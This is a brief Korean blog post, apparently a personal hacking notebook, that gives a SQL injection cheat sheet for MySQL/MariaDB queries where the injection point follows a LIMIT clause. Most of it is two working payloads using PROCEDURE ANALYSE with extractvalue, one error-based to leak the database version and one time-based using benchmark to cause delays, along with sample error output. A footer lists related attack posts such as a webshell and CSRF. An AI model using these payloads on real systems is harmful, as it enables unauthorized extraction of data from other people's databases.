-
PROCEDURE ANALYSE - SQLiHACK/WEB 2018. 8. 3. 20:57
아래 Cheat Sheet 는 Input Vector 가 LIMIT 절 이후에 올 경우 유용하게 쓰입니다.
Error based SQLi
SELECT myColumn FROM myTable WHERE 1=1 LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(), concat(0x3A, version()), 1);Output: ERROR 1105 (HY000): XPATH syntax error: ':10.1.33-MariaDB'Time based SQLi
SELECT myColumn FROM myTable WHERE 1=1 LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(), concat(0x3A, (IF(mid(version(), 1, 1) like 1, benchmark(5000000, sha1(1)), 1)))), 1);Output: ERROR 1105 (HY000): XPATH syntax error: ':0'
※ 약 1.5 초 Sleep
'HACK > WEB' 카테고리의 다른 글
Oracle SQLi with XXE (0) 2019.04.18 Thread Requests Example (0) 2018.11.07 SQLite 테이블, 컬럼 정보 가져오기 (0) 2018.08.09 JavaScript - CSRF (0) 2018.07.18 Only 특수문자 웹쉘(WebShell) (0) 2018.07.17